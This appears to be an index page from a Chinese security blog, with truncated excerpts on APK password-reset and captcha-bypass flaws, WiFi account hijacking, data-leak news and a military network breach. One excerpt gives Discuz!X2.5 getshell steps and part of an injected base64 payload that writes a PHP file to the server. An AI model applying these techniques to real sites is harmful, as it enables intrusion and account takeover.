0x4cdf

14X security


一次APK登录系统逻辑任意密码重置漏洞分析    作者:0x80目标:\\最近很少写文章、今天就带来一篇原理:   通过手机下载APK软件,由于找回密码参数的telephone未进行有效过滤,可使用任何手机号码发送验证码截取数据包、在重置更...

攻陷某网站后台+APK截取COOKIE思路             作者:0x80各种爆破,POST,都无用,这时候,不知道密码怎么办?但是通过另外一个点下载APK,在登录接口尝试截取SE...

手机APK利用JSON绕过验证码登陆漏洞    作者:0x80这个思路简单讲讲网站系统中我们明显看到了这样一段很明显是加过密的这样就能够难到我们吗,有的人可能想到了验证码爆破这个网站验证码6位,随便做一个就是上百万的字典,完全没必要其实我们通过网站系统对应的APK接口同样...

企业ERP系统面临的网络安全威胁一、ERP系统信息安全威胁安全问题的产生是一个非常复杂的问题,包含了多种因素的相互作用。总结起来,企业ERP系统所面临的信息安全威胁主要包括来自以下几个方面的内容:(一)ERP网络应用的威胁。来自网络层面的威胁主要来自远程访问企业内部系统所造成的信息泄漏隐患。随着企业规模的不断扩展,对外...

Discuz!X2.5Release20120407版命令执行漏洞Getshell利用方法1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQ...

“WIFI可破解5分钟控制用户微博”追踪家中WIFI五分钟“劫持”网内账户实验目的:测试家中WIFI内,利用黑客软件是否可以“劫持”其他网内用户资料。实验背景:在同一WIFI网内,“Evi1m0”使用一款黑客软件对另一台电脑上已登录的微博账号实施“劫持”,成功控制该微博账号的演示。实验过程:按照“Evi1m0”的演示...

京东信息泄露12G用户数据泄露源自2013年Struts2漏洞一本财经”昨日发布文章《京东数据疑似外泄:超过12个G,涉及数千万用户》,称最近黑市上有一12G的数据包开始流通,其中包括用户名、密码、邮箱、QQ号、电话号码、身份证等多个维度,数据多达数千万条。黑市买卖双方表示这些数据来自京东,而京东表示正紧急核实数据...

工业和信息化部关于开展互联网基础管理专项行动的通知附件:互联网基础管理专项行动工作方案工业和信息化部2016年11月28日  互联网基础管理专项行动工作方案   一、指导思想为贯彻习近平总书记系列重要讲话精神,落实全国社会治安综合治理创新工作会议提出的要求,...

韩军内网被黑客攻破为网络司令部成立以来首次   被黑一事透露,入侵韩军内网的黑客们所用攻击代码与此前朝鲜黑客常用代码类似,军方因此怀疑本案系朝鲜黑客所为。朝鲜黑客2014年窃取韩国水电与核电公司核电站工程设计图时,也曾留下蛛丝马迹。韩军一直声称内部国防网与外部互联网安全隔离,但...